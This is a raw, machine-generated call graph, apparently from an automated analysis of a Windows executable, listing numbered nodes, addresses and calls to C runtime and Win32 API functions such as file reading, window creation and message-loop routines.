4182f3 EnterCriticalSection 87081->87083 87089 418209 87082->87089 87083->87026 87085 4182e6 87085->87083 87116 411924 46 API calls 3 library calls 87085->87116 87088->87028 87090 418215 __commit 87089->87090 87091 418225 87090->87091 87092 41823d 87090->87092 87117 418901 46 API calls 2 library calls 87091->87117 87095 416b04 __malloc_crt 45 API calls 87092->87095 87101 41824b __commit 87092->87101 87094 41822a 87118 418752 46 API calls 9 library calls 87094->87118 87097 418256 87095->87097 87099 41825d 87097->87099 87100 41826c 87097->87100 87098 418231 87119 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 87098->87119 87120 417f77 46 API calls __getptd_noexit 87099->87120 87104 4182cb __lock 45 API calls 87100->87104 87101->87085 87106 418273 87104->87106 87107 4182a6 87106->87107 87108 41827b InitializeCriticalSectionAndSpinCount 87106->87108 87111 413748 _free 45 API calls 87107->87111 87109 418297 87108->87109 87110 41828b 87108->87110 87122 4182c2 LeaveCriticalSection _doexit 87109->87122 87112 413748 _free 45 API calls 87110->87112 87111->87109 87113 418291 87112->87113 87121 417f77 46 API calls __getptd_noexit 87113->87121 87117->87094 87118->87098 87120->87101 87121->87109 87122->87101 87123->87033 87124->87035 87301 40e6e0 87125->87301 87129 401f41 GetModuleFileNameW 87319 410100 87129->87319 87131 401f5c 87331 410960 87131->87331 87134 401b10 52 API calls 87135 401f81 87134->87135 87334 401980 87135->87334 87137 401f8e 87138 408f40 VariantClear 87137->87138 87139 401f9d 87138->87139 87140 401b10 52 API calls 87139->87140 87141 401fb4 87140->87141 87142 401980 53 API calls 87141->87142 87143 401fc3 87142->87143 87144 401b10 52 API calls 87143->87144 87145 401fd2 87144->87145 87342 40c2c0 87145->87342 87147 401fe1 87148 40bc70 52 API calls 87147->87148 87149 401ff3 87148->87149 87360 401a10 87149->87360 87151 401ffe 87367 4114ab 87151->87367 87154 428b05 87156 401a10 52 API calls 87154->87156 87155 402017 87157 4114ab __wcsicoll 58 API calls 87155->87157 87159 428b18 87156->87159 87158 402022 87157->87158 87158->87159 87160 40202d 87158->87160 87161 401a10 52 API calls 87159->87161 87162 4114ab __wcsicoll 58 API calls 87160->87162 87163 428b33 87161->87163 87164 402038 87162->87164 87166 428b3b GetModuleFileNameW 87163->87166 87165 402043 87164->87165 87164->87166 87167 4114ab __wcsicoll 58 API calls 87165->87167 87168 401a10 52 API calls 87166->87168 87169 40204e 87167->87169 87170 428b6c 87168->87170 87171 402092 87169->87171 87174 428b90 _wcscpy 87169->87174 87177 401a10 52 API calls 87169->87177 87172 40e0a0 52 API calls 87170->87172 87173 4020a3 87171->87173 87171->87174 87175 428b7a 87172->87175 87176 428bc6 87173->87176 87375 40e830 53 API calls 87173->87375 87182 401a10 52 API calls 87174->87182 87178 401a10 52 API calls 87175->87178 87180 402073 _wcscpy 87177->87180 87181 428b88 87178->87181 87186 401a10 52 API calls 87180->87186 87181->87174 87190 4020d0 87182->87190 87183 4020bb 87376 40cf00 53 API calls 87183->87376 87185 4020c6 87187 408f40 VariantClear 87185->87187 87186->87171 87187->87190 87188 402110 87192 408f40 VariantClear 87188->87192 87190->87188 87193 401a10 52 API calls 87190->87193 87377 40cf00 53 API calls 87190->87377 87378 40e6a0 53 API calls 87190->87378 87194 402120 ctype 87192->87194 87193->87190 87194->87039 87196 4295c9 __call_reportfault 87195->87196 87197 40f53c 87195->87197 87199 4295d9 GetOpenFileNameW 87196->87199 88049 410120 87197->88049 87199->87197 87201 40d5f5 87199->87201 87200 40f545 88053 4102b0 SHGetMalloc 87200->88053 87201->87046 87201->87048 87203 40f54c 88058 410190 GetFullPathNameW 87203->88058 87205 40f559 88069 40f570 87205->88069 88131 402400 87207->88131 87209 40146f 87211 428c29 _wcscat 87209->87211 88140 401500 87209->88140 87212 40147c 87212->87211 88148 40d440 87212->88148 87214 401489 87214->87211 87215 401491 GetFullPathNameW 87214->87215 87216 402160 52 API calls 87215->87216 87217 4014bb 87216->87217 87218 402160 52 API calls 87217->87218 87219 4014c8 87218->87219 87219->87211 87220 402160 52 API calls 87219->87220 87221 4014ee 87220->87221 87221->87046 87223 428361 87222->87223 87224 4103fc LoadImageW RegisterClassExW 87222->87224 88168 44395e EnumResourceNamesW LoadImageW 87223->88168 88167 410490 7 API calls 87224->88167 87227 40d651 87229 410570 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 87227->87229 87228 428368 87229->87059 87231 409202 87230->87231 87232 42d7ad 87230->87232 87255 409216 ctype 87231->87255 88426 410940 328 API calls 87231->88426 88429 45e737 90 API calls 3 library calls 87232->88429 87235 409386 87236 40939c 87235->87236 88427 40f190 10 API calls 87235->88427 87236->87063 87296 401000 Shell_NotifyIconW __call_reportfault 87236->87296 87238 4095b2 87238->87236 87240 4095bf 87238->87240 87239 409253 PeekMessageW 87239->87255 88428 401a50 328 API calls 87240->88428 87242 42d8cd Sleep 87242->87255 87243 4095c6 LockWindowUpdate DestroyWindow GetMessageW 87243->87236 87246 4095f9 87243->87246 87245 42e13b 88443 40d410 VariantClear 87245->88443 87248 42e158 TranslateMessage DispatchMessageW GetMessageW 87246->87248 87248->87248 87251 42e188 87248->87251 87250 409567 PeekMessageW 87250->87255 87251->87236 87254 44c29d 52 API calls 87278 4094e0 87254->87278 87255->87235 87255->87239 87255->87242 87255->87245 87255->87250 87257 46f3c1 107 API calls 87255->87257 87258 40e0a0 52 API calls 87255->87258 87259 409551 TranslateMessage DispatchMessageW 87255->87259 87261 42dcd2 WaitForSingleObject 87255->87261 87262 42dd3d Sleep 87255->87262 87263 47d33e 306 API calls 87255->87263 87268 4094cf Sleep 87255->87268 87270 40d410 VariantClear 87255->87270 87272 42d94d timeGetTime 87255->87272 87255->87278 87286 45e737 90 API calls 87255->87286 87288 408cc0 197 API calls 87255->87288 87290 42e0cc VariantClear 87255->87290 87291 408f40 VariantClear 87255->87291 88169 4091b0 87255->88169 88227 40afa0 87255->88227 88253 408fc0 87255->88253 88288 40d150 87255->88288 88293 40d170 87255->88293 88299 4096a0 87255->88299 88430 465124 53 API calls 87255->88430 88431 40c620 timeGetTime 87255->88431 88442 40e270 VariantClear ctype 87255->88442 87256 46fdbf 108 API calls 87256->87278 87257->87255 87258->87255 87259->87250 87261->87255 87264 42dcf0 GetExitCodeProcess CloseHandle 87261->87264 87262->87278 87263->87255 88436 40d410 VariantClear 87264->88436 87268->87278 87270->87255 88432 465124 53 API calls 87272->88432 87274 40c620 timeGetTime 87274->87278 87276 465124 53 API calls 87276->87278 87277 42dd89 CloseHandle 87277->87278 87278->87254 87278->87255 87278->87256 87278->87274 87278->87276 87278->87277 87280 42de19 GetExitCodeProcess CloseHandle 87278->87280 87281 403cd0 VariantClear 87278->87281 87283 42de88 Sleep 87278->87283 87289 408f40 VariantClear 87278->87289 87293 401980 53 API calls 87278->87293 87294 401b10 52 API calls 87278->87294 88433 45178a 54 API calls 87278->88433 88434 47d33e 328 API calls 87278->88434 88435 453bc6 54 API calls 87278->88435 88437 40d410 VariantClear 87278->88437 88438 443d19 67 API calls _wcslen 87278->88438 88439 4574b4 VariantClear 87278->88439 88440 4731e1 VariantClear 87278->88440 88441 4331a2 6 API calls 87278->88441 87280->87278 87281->87283 87283->87255 87286->87255 87288->87255 87289->87278 87290->87255 87291->87255 87293->87278 87294->87278 87296->87063 87297->87046 87298->87055 87299->87071 87300->87074 87302 40bc70 52 API calls 87301->87302 87303 401f31 87302->87303 87304 402560 87303->87304 87305 40256d __write_nolock 87304->87305 87306 402160 52 API calls 87305->87306 87308 402593 87306->87308 87318 4025bd 87308->87318 87379 401c90 87308->87379 87309 4026f0 52 API calls 87309->87318 87310 4026a7 87311 401b10 52 API calls 87310->87311 87316 4026db 87310->87316 87313 4026d1 87311->87313 87312 401b10 52 API calls 87312->87318 87383 40d7c0 52 API calls 2 library calls 87313->87383 87314 401c90 52 API calls 87314->87318 87316->87129 87318->87309 87318->87310 87318->87312 87318->87314 87382 40d7c0 52 API calls 2 library calls 87318->87382 87384 40f760 87319->87384 87322 410118 87322->87131 87324 42805d 87325 42806a 87324->87325 87440 431e58 87324->87440 87327 413748 _free 46 API calls 87325->87327 87328 428078 87327->87328 87329 431e58 82 API calls 87328->87329 87330 428084 87329->87330 87330->87131 87332 4115d7 52 API calls 87331->87332 87333 401f74 87332->87333 87333->87134 87335 4019a3 87334->87335 87338 401985 87334->87338 87336 4019b8 87335->87336 87335->87338 88038 403e10 53 API calls 87336->88038 87337 40199f 87337->87137 87338->87337 88037 403e10 53 API calls 87338->88037 87341 4019c4 87341->87137 87343 40c2c7 87342->87343 87344 40c30e 87342->87344 87347 40c2d3 87343->87347 87348 426c79 87343->87348 87345 40c315 87344->87345 87346 426c2b 87344->87346 87352 40c321 87345->87352 87353 426c5a 87345->87353 87350 426c4b 87346->87350 87351 426c2e 87346->87351 88039 403ea0 52 API calls __cinit 87347->88039 88044 4534e3 52 API calls 87348->88044 88042 4534e3 52 API calls 87350->88042 87358 40c2de 87351->87358 88041 4534e3 52 API calls 87351->88041 88040 403ea0 52 API calls __cinit 87352->88040 88043 4534e3 52 API calls 87353->88043 87358->87147 87361 401a30 87360->87361 87362 401a17 87360->87362 87363 402160 52 API calls 87361->87363 87364 401a2d 87362->87364 88045 403c30 52 API calls _memmove 87362->88045 87365 401a3d 87363->87365 87364->87151 87365->87151 87368 411523 87367->87368 87369 4114ba 87367->87369 88048 4113a8 58 API calls 3 library calls 87368->88048 87371 40200c 87369->87371 88046 417f77 46 API calls __getptd_noexit 87369->88046 87371->87154 87371->87155 87373 4114c6 88047 417f25 10 API calls __wcsicoll 87373->88047 87375->87183 87376->87185 87377->87190 87378->87190 87380 4026f0 52 API calls 87379->87380 87381 401c97 87380->87381 87381->87308 87382->87318 87383->87316 87385 40f6f0 54 API calls 87384->87385 87386 40f77b _strcat ctype 87385->87386 87444 40f850 87386->87444 87392 40f7fc 87393 427c2a 87392->87393 87394 40f804 87392->87394 87473 414d04 87393->87473 87460 414a46 87394->87460 87398 40f80e 87398->87322 87403 4528bd 87398->87403 87400 427c59 87479 414fe2 87400->87479 87402 427c79 87404 4150d1 _fseek 81 API calls 87403->87404 87405 452930 87404->87405 87979 452719 87405->87979 87408 452948 87408->87324 87409 414d04 __fread_nolock 61 API calls 87410 452966 87409->87410 87411 414d04 __fread_nolock 61 API calls 87410->87411 87412 452976 87411->87412 87413 414d04 __fread_nolock 61 API calls 87412->87413 87414 45298f 87413->87414 87415 414d04 __fread_nolock 61 API calls 87414->87415 87416 4529aa 87415->87416 87417 4150d1 _fseek 81 API calls 87416->87417 87418 4529c4 87417->87418 87419 4135bb _malloc 46 API calls 87418->87419 87420 4529cf 87419->87420 87421 4135bb _malloc 46 API calls 87420->87421 87422 4529db 87421->87422 87423 414d04 __fread_nolock 61 API calls 87422->87423 87424 4529ec 87423->87424 87425 44afef GetSystemTimeAsFileTime 87424->87425 87426 452a00 87425->87426 87427 452a36 87426->87427 87428 452a13 87426->87428 87429 452aa5 87427->87429 87430 452a3c 87427->87430 87431 413748 _free 46 API calls 87428->87431 87434 413748 _free 46 API calls 87429->87434 87985 44b1a9 87430->87985 87432 452a1c 87431->87432 87435 413748 _free 46 API calls 87432->87435 87437 452aa3 87434->87437 87438 452a25 87435->87438 87436 452a9d 87439 413748 _free 46 API calls 87436->87439 87437->87324 87438->87324 87439->87437 87441 431e64 87440->87441 87442 431e6a 87440->87442 87443 414a46 __fcloseall 82 API calls 87441->87443 87442->87325 87443->87442 87446 40f85d __call_reportfault _strlen 87444->87446 87447 40f7ab 87446->87447 87492 414db8 87446->87492 87448 4149c2 87447->87448 87507 414904 87448->87507 87450 40f7e9 87450->87393 87451 40f5c0 87450->87451 87454 40f5cd _strcat __write_nolock _memmove 87451->87454 87452 414d04 __fread_nolock 61 API calls 87452->87454 87453 40f691 __tzset_nolock 87453->87392 87454->87452 87454->87453 87459 425d11 87454->87459 87595 4150d1 87454->87595 87456 4150d1 _fseek 81 API calls 87457 425d33 87456->87457 87458 414d04 __fread_nolock 61 API calls 87457->87458 87458->87453 87459->87456 87461 414a52 __commit 87460->87461 87462 414a64 87461->87462 87463 414a79 87461->87463 87735 417f77 46 API calls __getptd_noexit 87462->87735 87466 415471 __lock_file 47 API calls 87463->87466 87471 414a74 __commit 87463->87471 87465 414a69 87736 417f25 10 API calls __wcsicoll 87465->87736 87468 414a92 87466->87468 87719 4149d9 87468->87719 87471->87398 87804 414c76 87473->87804 87475 414d1c 87476 44afef 87475->87476 87972 442c5a 87476->87972 87478 44b00d 87478->87400 87480 414fee __commit 87479->87480 87481 414ffa 87480->87481 87482 41500f 87480->87482 87976 417f77 46 API calls __getptd_noexit 87481->87976 87483 415471 __lock_file 47 API calls 87482->87483 87485 415017 87483->87485 87487 414e4e __ftell_nolock 51 API calls 87485->87487 87486 414fff 87977 417f25 10 API calls __wcsicoll 87486->87977 87489 415024 87487->87489 87978 41503d LeaveCriticalSection LeaveCriticalSection _fprintf 87489->87978 87491 41500a __commit 87491->87402 87493 414dd6 87492->87493 87494 414deb 87492->87494 87503 417f77 46 API calls __getptd_noexit 87493->87503 87494->87493 87496 414df2 87494->87496 87505 41b91b 79 API calls 11 library calls 87496->87505 87497 414ddb 87504 417f25 10 API calls __wcsicoll 87497->87504 87499 414e18 87501 414de6 87499->87501 87506 418f98 77 API calls 5 library calls 87499->87506 87501->87446 87503->87497 87504->87501 87505->87499 87506->87501 87510 414910 __commit 87507->87510 87508 414923 87563 417f77 46 API calls __getptd_noexit 87508->87563 87510->87508 87512 414951 87510->87512 87511 414928 87564 417f25 10 API calls __wcsicoll 87511->87564 87526 41d4d1 87512->87526 87515 414956 87516 41496a 87515->87516 87517 41495d 87515->87517 87519 414992 87516->87519 87520 414972 87516->87520 87565 417f77 46 API calls __getptd_noexit 87517->87565 87543 41d218 87519->87543 87566 417f77 46 API calls __getptd_noexit 87520->87566 87523 414933 __commit @_EH4_CallFilterFunc@8 87523->87450 87527 41d4dd __commit 87526->87527 87528 4182cb __lock 46 API calls 87527->87528 87529 41d4eb 87528->87529 87530 41d567 87529->87530 87538 418209 __mtinitlocknum 46 API calls 87529->87538 87541 41d560 87529->87541 87571 4154b2 47 API calls __lock 87529->87571 87572 415520 LeaveCriticalSection LeaveCriticalSection _doexit 87529->87572 87532 416b04 __malloc_crt 46 API calls 87530->87532 87533 41d56e 87532->87533 87535 41d57c InitializeCriticalSectionAndSpinCount 87533->87535 87533->87541 87534 41d5f0 __commit 87534->87515 87536 41d59c 87535->87536 87537 41d5af EnterCriticalSection 87535->87537 87540 413748 _free 46 API calls 87536->87540 87537->87541 87538->87529 87540->87541 87568 41d5fb 87541->87568 87544 41d23a 87543->87544 87545 41d255 87544->87545 87557 41d26c __wopenfile 87544->87557 87577 417f77 46 API calls __getptd_noexit 87545->87577 87547 41d25a 87578 417f25 10 API calls __wcsicoll 87547->87578 87548 41d421 87550 41d47a 87548->87550 87551 41d48c 87548->87551 87582 417f77 46 API calls __getptd_noexit 87550->87582 87574 422bf9 87551->87574 87554 41499d 87567 4149b8 LeaveCriticalSection LeaveCriticalSection _fprintf 87554->87567 87555 41d47f 87583 417f25 10 API calls __wcsicoll 87555->87583 87557->87548 87557->87550 87579 41341f 58 API calls 2 library calls 87557->87579 87559 41d41a 87559->87548 87580 41341f 58 API calls 2 library calls 87559->87580 87561 41d439 87561->87548 87581 41341f 58 API calls 2 library calls 87561->87581 87563->87511 87564->87523 87565->87523 87566->87523 87567->87523 87573 4181f2 LeaveCriticalSection 87568->87573 87570 41d602 87570->87534 87571->87529 87572->87529 87573->87570 87584 422b35 87574->87584 87576 422c14 87576->87554 87577->87547 87578->87554 87579->87559 87580->87561 87581->87548 87582->87555 87583->87554 87585 422b41 __commit 87584->87585 87586 422b54 87585->87586 87589 422b8a 87585->87589 87587 417f77 __wcsicoll 46 API calls 87586->87587 87588 422b59 87587->87588 87591 417f25 __wcsicoll 10 API calls 87588->87591 87590 422400 __tsopen_nolock 109 API calls 87589->87590 87592 422ba4 87590->87592 87594 422b63 __commit 87591->87594 87593 422bcb __wsopen_helper LeaveCriticalSection 87592->87593 87593->87594 87594->87576 87598 4150dd __commit 87595->87598 87596 4150e9 87626 417f77 46 API calls __getptd_noexit 87596->87626 87598->87596 87599 41510f 87598->87599 87608 415471 87599->87608 87600 4150ee 87627 417f25 10 API calls __wcsicoll 87600->87627 87606 4150f9 __commit 87606->87454 87609 415483 87608->87609 87610 4154a5 EnterCriticalSection 87608->87610 87609->87610 87611 41548b 87609->87611 87612 415117 87610->87612 87613 4182cb __lock 46 API calls 87611->87613 87614 415047 87612->87614 87613->87612 87615 415067 87614->87615 87616 415057 87614->87616 87621 415079 87615->87621 87629 414e4e 87615->87629 87684 417f77 46 API calls __getptd_noexit 87616->87684 87620 41505c 87628 415143 LeaveCriticalSection LeaveCriticalSection _fprintf 87620->87628 87646 41443c 87621->87646 87624 4150b9 87659 41e1f4 87624->87659 87626->87600 87627->87606 87628->87606 87630 414e61 87629->87630 87631 414e79 87629->87631 87685 417f77 46 API calls __getptd_noexit 87630->87685 87633 414139 __stbuf 46 API calls 87631->87633 87635 414e80 87633->87635 87634 414e66 87686 417f25 10 API calls __wcsicoll 87634->87686 87637 41e1f4 __write 51 API calls 87635->87637 87638 414e97 87637->87638 87639 414ec9 87638->87639 87640 414f09 87638->87640 87645 414e71 87638->87645 87642 41e1f4 __write 51 API calls 87639->87642 87639->87645 87687 417f77 46 API calls __getptd_noexit 87640->87687 87643 414f64 87642->87643 87644 41e1f4 __write 51 API calls 87643->87644 87643->87645 87644->87645 87645->87621 87647 414477 87646->87647 87648 414455 87646->87648 87652 414139 87647->87652 87648->87647 87649 414139 __stbuf 46 API calls 87648->87649 87650 414470 87649->87650 87688 41b7b2 77 API calls 5 library calls 87650->87688 87653 414145 87652->87653 87654 41415a 87652->87654 87689 417f77 46 API calls __getptd_noexit 87653->87689 87654->87624 87656 41414a 87690 417f25 10 API calls __wcsicoll 87656->87690 87658 414155 87658->87624 87660 41e200 __commit 87659->87660 87661 41e223 87660->87661 87662 41e208 87660->87662 87664 41e22f 87661->87664 87667 41e269 87661->87667 87711 417f8a 46 API calls __getptd_noexit 87662->87711 87713 417f8a 46 API calls __getptd_noexit 87664->87713 87665 41e20d 87712 417f77 46 API calls __getptd_noexit 87665->87712 87691 41ae56 87667->87691 87669 41e234 87714 417f77 46 API calls __getptd_noexit 87669->87714 87672 41e26f 87674 41e291 87672->87674 87675 41e27d 87672->87675 87673 41e23c 87715 417f25 10 API calls __wcsicoll 87673->87715 87716 417f77 46 API calls __getptd_noexit 87674->87716 87701 41e17f 87675->87701 87677 41e215 __commit 87677->87620 87680 41e289 87718 41e2c0 LeaveCriticalSection __unlock_fhandle 87680->87718 87681 41e296 87717 417f8a 46 API calls __getptd_noexit 87681->87717 87684->87620 87685->87634 87686->87645 87687->87645 87688->87647 87689->87656 87690->87658 87692 41ae62 __commit 87691->87692 87693 41aebc 87692->87693 87694 4182cb __lock 46 API calls 87692->87694 87695 41aec1 EnterCriticalSection 87693->87695 87696 41aede __commit 87693->87696 87697 41ae8e 87694->87697 87695->87696 87696->87672 87698 41aeaa 87697->87698 87699 41ae97 InitializeCriticalSectionAndSpinCount 87697->87699 87700 41aeec ___lock_fhandle LeaveCriticalSection 87698->87700 87699->87698 87700->87693 87702 41aded __commit 46 API calls 87701->87702 87703 41e18e 87702->87703 87704 41e1a4 SetFilePointer 87703->87704 87705 41e194 87703->87705 87706 41e1c3 87704->87706 87707 41e1bb GetLastError 87704->87707 87708 417f77 __wcsicoll 46 API calls 87705->87708 87709 417f9d __dosmaperr 46 API calls 87706->87709 87710 41e199 87706->87710 87707->87706 87708->87710 87709->87710 87710->87680 87711->87665 87712->87677 87713->87669 87714->87673 87715->87677 87716->87681 87717->87680 87718->87677 87720 4149ea 87719->87720 87721 4149fe 87719->87721 87765 417f77 46 API calls __getptd_noexit 87720->87765 87723 4149fa 87721->87723 87725 41443c __flush 77 API calls 87721->87725 87737 414ab2 LeaveCriticalSection LeaveCriticalSection _fprintf 87723->87737 87724 4149ef 87766 417f25 10 API calls __wcsicoll 87724->87766 87727 414a0a 87725->87727 87738 41d8c2 87727->87738 87730 414139 __stbuf 46 API calls 87731 414a18 87730->87731 87742 41d7fe 87731->87742 87733 414a1e 87733->87723 87734 413748 _free 46 API calls 87733->87734 87734->87723 87735->87465 87736->87471 87737->87471 87739 414a12 87738->87739 87740 41d8d2 87738->87740 87739->87730 87740->87739 87741 413748 _free 46 API calls 87740->87741 87741->87739 87743 41d80a __commit 87742->87743 87744 41d812 87743->87744 87745 41d82d 87743->87745 87782 417f8a 46 API calls __getptd_noexit 87744->87782 87747 41d839 87745->87747 87751 41d873 87745->87751 87784 417f8a 46 API calls __getptd_noexit 87747->87784 87748 41d817 87783 417f77 46 API calls __getptd_noexit 87748->87783 87750 41d83e 87785 417f77 46 API calls __getptd_noexit 87750->87785 87754 41ae56 ___lock_fhandle 48 API calls 87751->87754 87756 41d879 87754->87756 87755 41d846 87786 417f25 10 API calls __wcsicoll 87755->87786 87758 41d893 87756->87758 87759 41d887 87756->87759 87787 417f77 46 API calls __getptd_noexit 87758->87787 87767 41d762 87759->87767 87762 41d81f __commit 87762->87733 87763 41d88d 87788 41d8ba LeaveCriticalSection __unlock_fhandle 87763->87788 87765->87724 87766->87723 87789 41aded 87767->87789 87769 41d7c8 87802 41ad67 47 API calls 2 library calls 87769->87802 87771 41d772 87771->87769 87772 41d7a6 87771->87772 87775 41aded __commit 46 API calls 87771->87775 87772->87769 87773 41aded __commit 46 API calls 87772->87773 87777 41d7b2 CloseHandle 87773->87777 87774 41d7d0 87778 41d7f2 87774->87778 87803 417f9d 46 API calls 3 library calls 87774->87803 87776 41d79d 87775->87776 87779 41aded __commit 46 API calls 87776->87779 87777->87769 87780 41d7be GetLastError 87777->87780 87778->87763 87779->87772 87780->87769 87782->87748 87783->87762 87784->87750 87785->87755 87786->87762 87787->87763 87788->87762 87790 41ae12 87789->87790 87791 41adfa 87789->87791 87793 417f8a __commit 46 API calls 87790->87793 87797 41ae51 87790->87797 87792 417f8a __commit 46 API calls 87791->87792 87794 41adff 87792->87794 87796 41ae23 87793->87796 87795 417f77 __wcsicoll 46 API calls 87794->87795 87798 41ae07 87795->87798 87799 417f77 __wcsicoll 46 API calls 87796->87799 87797->87771 87798->87771 87800 41ae2b 87799->87800 87801 417f25 __wcsicoll 10 API calls 87800->87801 87801->87798 87802->87774 87803->87778 87805 414c82 __commit 87804->87805 87806 414cc3 87805->87806 87807 414c96 __call_reportfault 87805->87807 87808 414cbb __commit 87805->87808 87809 415471 __lock_file 47 API calls 87806->87809 87831 417f77 46 API calls __getptd_noexit 87807->87831 87808->87475 87810 414ccb 87809->87810 87817 414aba 87810->87817 87813 414cb0 87832 417f25 10 API calls __wcsicoll 87813->87832 87818 414af2 87817->87818 87821 414ad8 __call_reportfault 87817->87821 87833 414cfa LeaveCriticalSection LeaveCriticalSection _fprintf 87818->87833 87819 414ae2 87884 417f77 46 API calls __getptd_noexit 87819->87884 87821->87818 87821->87819 87830 414b2d 87821->87830 87824 414c38 __call_reportfault 87887 417f77 46 API calls __getptd_noexit 87824->87887 87825 414139 __stbuf 46 API calls 87825->87830 87829 414ae7 87885 417f25 10 API calls __wcsicoll 87829->87885 87830->87818 87830->87824 87830->87825 87834 41dfcc 87830->87834 87864 41d8f3 87830->87864 87886 41e0c2 46 API calls 3 library calls 87830->87886 87831->87813 87832->87808 87833->87808 87835 41dfd8 __commit 87834->87835 87836 41dfe0 87835->87836 87837 41dffb 87835->87837 87957 417f8a 46 API calls __getptd_noexit 87836->87957 87838 41e007 87837->87838 87843 41e041 87837->87843 87959 417f8a 46 API calls __getptd_noexit 87838->87959 87841 41dfe5 87958 417f77 46 API calls __getptd_noexit 87841->87958 87842 41e00c 87960 417f77 46 API calls __getptd_noexit 87842->87960 87846 41e063 87843->87846 87847 41e04e 87843->87847 87848 41ae56 ___lock_fhandle 48 API calls 87846->87848 87962 417f8a 46 API calls __getptd_noexit 87847->87962 87852 41e069 87848->87852 87849 41e014 87961 417f25 10 API calls __wcsicoll 87849->87961 87851 41e053 87963 417f77 46 API calls __getptd_noexit 87851->87963 87855 41e077 87852->87855 87856 41e08b 87852->87856 87854 41dfed __commit 87854->87830 87888 41da15 87855->87888 87964 417f77 46 API calls __getptd_noexit 87856->87964 87860 41e083 87966 41e0ba LeaveCriticalSection __unlock_fhandle 87860->87966 87861 41e090 87965 417f8a 46 API calls __getptd_noexit 87861->87965 87865 41d900 87864->87865 87869 41d915 87864->87869 87970 417f77 46 API calls __getptd_noexit 87865->87970 87867 41d905 87971 417f25 10 API calls __wcsicoll 87867->87971 87870 41d94a 87869->87870 87876 41d910 87869->87876 87967 420603 87869->87967 87872 414139 __stbuf 46 API calls 87870->87872 87873 41d95e 87872->87873 87874 41dfcc __read 59 API calls 87873->87874 87875 41d965 87874->87875 87875->87876 87877 414139 __stbuf 46 API calls 87875->87877 87876->87830 87878 41d988 87877->87878 87878->87876 87879 414139 __stbuf 46 API calls 87878->87879 87880 41d994 87879->87880 87880->87876 87881 414139 __stbuf 46 API calls 87880->87881 87882 41d9a1 87881->87882 87883 414139 __stbuf 46 API calls 87882->87883 87883->87876 87884->87829 87885->87818 87886->87830 87887->87829 87889 41da31 87888->87889 87890 41da4c 87888->87890 87892 417f8a __commit 46 API calls 87889->87892 87891 41da5b 87890->87891 87893 41da7a 87890->87893 87894 417f8a __commit 46 API calls 87891->87894 87895 41da36 87892->87895 87897 41da98 87893->87897 87908 41daac 87893->87908 87896 41da60 87894->87896 87898 417f77 __wcsicoll 46 API calls 87895->87898 87900 417f77 __wcsicoll 46 API calls 87896->87900 87901 417f8a __commit 46 API calls 87897->87901 87909 41da3e 87898->87909 87899 41db02 87903 417f8a __commit 46 API calls 87899->87903 87902 41da67 87900->87902 87904 41da9d 87901->87904 87905 417f25 __wcsicoll 10 API calls 87902->87905 87906 41db07 87903->87906 87907 417f77 __wcsicoll 46 API calls 87904->87907 87905->87909 87910 417f77 __wcsicoll 46 API calls 87906->87910 87911 41daa4 87907->87911 87908->87899 87908->87909 87912 41dae1 87908->87912 87913 41db1b 87908->87913 87909->87860 87910->87911 87914 417f25 __wcsicoll 10 API calls 87911->87914 87912->87899 87917 41daec ReadFile 87912->87917 87916 416b04 __malloc_crt 46 API calls 87913->87916 87914->87909 87918 41db31 87916->87918 87919 41dc17 87917->87919 87920 41df8f GetLastError 87917->87920 87923 41db59 87918->87923 87924 41db3b 87918->87924 87919->87920 87927 41dc2b 87919->87927 87921 41de16 87920->87921 87922 41df9c 87920->87922 87931 417f9d __dosmaperr 46 API calls 87921->87931 87936 41dd9b 87921->87936 87925 417f77 __wcsicoll 46 API calls 87922->87925 87928 420494 __lseeki64_nolock 48 API calls 87923->87928 87926 417f77 __wcsicoll 46 API calls 87924->87926 87929 41dfa1 87925->87929 87930 41db40 87926->87930 87927->87936 87937 41dc47 87927->87937 87940 41de5b 87927->87940 87932 41db67 87928->87932 87933 417f8a __commit 46 API calls 87929->87933 87934 417f8a __commit 46 API calls 87930->87934 87931->87936 87932->87917 87933->87936 87934->87909 87935 413748 _free 46 API calls 87935->87909 87936->87909 87936->87935 87938 41dcab ReadFile 87937->87938 87945 41dd28 87937->87945 87943 41dcc9 GetLastError 87938->87943 87948 41dcd3 87938->87948 87939 41ded0 ReadFile 87941 41deef GetLastError 87939->87941 87949 41def9 87939->87949 87940->87936 87940->87939 87941->87940 87941->87949 87942 41ddec MultiByteToWideChar 87942->87936 87944 41de10 GetLastError 87942->87944 87943->87937 87943->87948 87944->87921 87945->87936 87946 41dda3 87945->87946 87947 41dd96 87945->87947 87953 41dd60 87945->87953 87946->87953 87954 41ddda 87946->87954 87950 417f77 __wcsicoll 46 API calls 87947->87950 87948->87937 87951 420494 __lseeki64_nolock 48 API calls 87948->87951 87949->87940 87952 420494 __lseeki64_nolock 48 API calls 87949->87952 87950->87936 87951->87948 87952->87949 87953->87942 87955 420494 __lseeki64_nolock 48 API calls 87954->87955 87956 41dde9 87955->87956 87956->87942 87957->87841 87958->87854 87959->87842 87960->87849 87961->87854 87962->87851 87963->87849 87964->87861 87965->87860 87966->87854 87968 416b04 __malloc_crt 46 API calls 87967->87968 87969 420618 87968->87969 87969->87870 87970->87867 87971->87876 87975 4148b3 GetSystemTimeAsFileTime __aulldiv 87972->87975 87974 442c6b 87974->87478 87975->87974 87976->87486 87977->87491 87978->87491 87983 45272f __tzset_nolock _wcscpy 87979->87983 87980 414d04 61 API calls __fread_nolock 87980->87983 87981 44afef GetSystemTimeAsFileTime 87981->87983 87982 4528a4 87982->87408 87982->87409 87983->87980 87983->87981 87983->87982 87984 4150d1 81 API calls _fseek 87983->87984 87984->87983 87986 44b1bc 87985->87986 87987 44b1ca 87985->87987 87988 4149c2 116 API calls 87986->87988 87989 44b1e1 87987->87989 87990 4149c2 116 API calls 87987->87990 87991 44b1d8 87987->87991 87988->87987 88020 4321a4 87989->88020 87993 44b2db 87990->87993 87991->87436 87993->87989 87995 44b2e9 87993->87995 87994 44b224 87996 44b253 87994->87996 87997 44b228 87994->87997 87998 44b2f6 87995->87998 88000 414a46 __fcloseall 82 API calls 87995->88000 88024 43213d 87996->88024 87999 44b235 87997->87999 88002 414a46 __fcloseall 82 API calls 87997->88002 87998->87436 88003 44b245 87999->88003 88005 414a46 __fcloseall 82 API calls 87999->88005 88000->87998 88002->87999 88003->87436 88004 44b25a 88006 44b260 88004->88006 88007 44b289 88004->88007 88005->88003 88009 414a46 __fcloseall 82 API calls 88006->88009 88010 44b26d 88006->88010 88034 44b0bf 87 API calls 88007->88034 88009->88010 88011 44b27d 88010->88011 88013 414a46 